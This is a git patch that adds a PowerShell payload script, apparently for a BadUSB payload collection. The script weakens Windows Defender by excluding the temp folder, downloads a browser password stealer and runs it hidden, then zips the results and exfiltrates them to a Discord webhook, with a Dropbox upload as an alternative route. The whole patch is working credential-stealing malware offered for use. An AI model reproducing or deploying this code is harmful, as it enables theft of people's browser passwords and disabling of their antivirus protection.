From a7489f5730d47a51ea1caf727039946a59661517 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Wed, 28 Dec 2022 23:30:09 -0600 Subject: [PATCH] Update BrowserPasswords.ps1 --- .../BrowserPasswords.ps1 | 62 +++++++++++++++++++ 1 file changed, 62 insertions(+) diff --git a/Payloads/Flip-BrowserPasswords/BrowserPasswords.ps1 b/Payloads/Flip-BrowserPasswords/BrowserPasswords.ps1 index 8b13789..016874e 100644 --- a/Payloads/Flip-BrowserPasswords/BrowserPasswords.ps1 +++ b/Payloads/Flip-BrowserPasswords/BrowserPasswords.ps1 @@ -1 +1,63 @@ +function DropBox-Upload { +[CmdletBinding()] +param ( + +[Parameter (Mandatory = $True, ValueFromPipeline = $True)] +[Alias("f")] +[string]$SourceFilePath +) +$outputFile = Split-Path $SourceFilePath -leaf +$TargetFilePath="/$outputFile" +$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }' +$authorization = "Bearer " + $db +$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]" +$headers.Add("Authorization", $authorization) +$headers.Add("Dropbox-API-Arg", $arg) +$headers.Add("Content-Type", 'application/octet-stream') +Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers +} + +if (-not ([string]::IsNullOrEmpty($db))){DropBox-Upload -f $env:TMP\$FileName} + +#------------------------------------------------------------------------------------------------------------------------------------ + +function Upload-Discord { + +[CmdletBinding()] +param ( + [parameter(Position=0,Mandatory=$False)] + [string]$file, + [parameter(Position=1,Mandatory=$False)] + [string]$text +) + +$hookurl = "$dc" + +$Body = @{ + 'username' = $env:username + 'content' = $text +} + +if (-not ([string]::IsNullOrEmpty($text))){ +Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)}; + +if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl} +} + +if (-not ([string]::IsNullOrEmpty($dc))){Upload-Discord -file $env:TMP\$FileName} + + + +# Add C:/ to exlusions so Windows Defender doesnt flag the exe we will download +Add-MpPreference -ExclusionPath $env:tmp + +# Download the exe and save it to temp directory +iwr "COMING SOON" -outfile "$env:tmp\browser.exe" + +# Execute the Browser Stealer +cd $env:tmp;Start-Process -FilePath "$env:tmp\browser.exe" -WindowStyle h -Wait + +# Exfiltrate the loot to discord +Compress-Archive -Path "$env:tmp\results" -DestinationPath $env:tmp\browserdata.zip +Upload-Discord -file "$env:tmp\browserdata.zip"